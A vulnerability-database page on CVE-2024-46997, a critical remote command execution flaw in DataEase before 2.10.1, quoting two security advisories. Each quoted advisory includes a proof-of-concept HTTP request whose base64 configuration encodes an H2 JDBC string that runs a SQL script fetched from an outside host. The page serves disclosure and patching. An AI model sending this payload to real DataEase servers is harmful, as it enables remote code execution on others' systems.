CVE-2024-46997
published 2024-09-23CVE-2024-46997: DataEase is an open source data visualization analysis tool. Prior to version 2.10.1, an attacker can achieve remote command execution by adding a carefully…
PriorityP261critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
1.44%
69.9th percentile
DataEase is an open source data visualization analysis tool. Prior to version 2.10.1, an attacker can achieve remote command execution by adding a carefully constructed h2 data source connection string. The vulnerability has been fixed in v2.10.1.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dataease | dataease | < 2.10.1 | 2.10.1 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
DataEase's H2 datasource has a remote command execution risk
ghsa·2024-09-23
CVE-2024-46997 [CRITICAL] CWE-74 DataEase's H2 datasource has a remote command execution risk
DataEase's H2 datasource has a remote command execution risk
### Impact
An attacker can achieve remote command execution by adding a carefully constructed h2 data source connection string.
request message:
```
POST /de2api/datasource/validate HTTP/1.1
Host: dataease.ubuntu20.vm
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-DE-TOKEN: jwt
Content-Length: 209
Content-Type: application/json
{
"id": "",
"name": "test",
"type": "h2",
"configuration": "eyJqZGJjIjogImpkYmM6aDI6bWVtOnRlc3Q7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0zO0lOSVQ9UlVOU0NSSVBUIEZST00gJ2h0dHA6Ly8xMC4xNjguMTc0LjE6ODAwMC9wb2Muc3FsJzsifQ=="
}
```
h2 data source connection string:
```
// configuration
{
"jdbc": "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '[http://1
OSV
DataEase's H2 datasource has a remote command execution risk
osv·2024-09-23
CVE-2024-46997 [CRITICAL] DataEase's H2 datasource has a remote command execution risk
DataEase's H2 datasource has a remote command execution risk
### Impact
An attacker can achieve remote command execution by adding a carefully constructed h2 data source connection string.
request message:
```
POST /de2api/datasource/validate HTTP/1.1
Host: dataease.ubuntu20.vm
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-DE-TOKEN: jwt
Content-Length: 209
Content-Type: application/json
{
"id": "",
"name": "test",
"type": "h2",
"configuration": "eyJqZGJjIjogImpkYmM6aDI6bWVtOnRlc3Q7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0zO0lOSVQ9UlVOU0NSSVBUIEZST00gJ2h0dHA6Ly8xMC4xNjguMTc0LjE6ODAwMC9wb2Muc3FsJzsifQ=="
}
```
h2 data source connection string:
```
// configuration
{
"jdbc": "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '[http://1
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2024-09-23
Published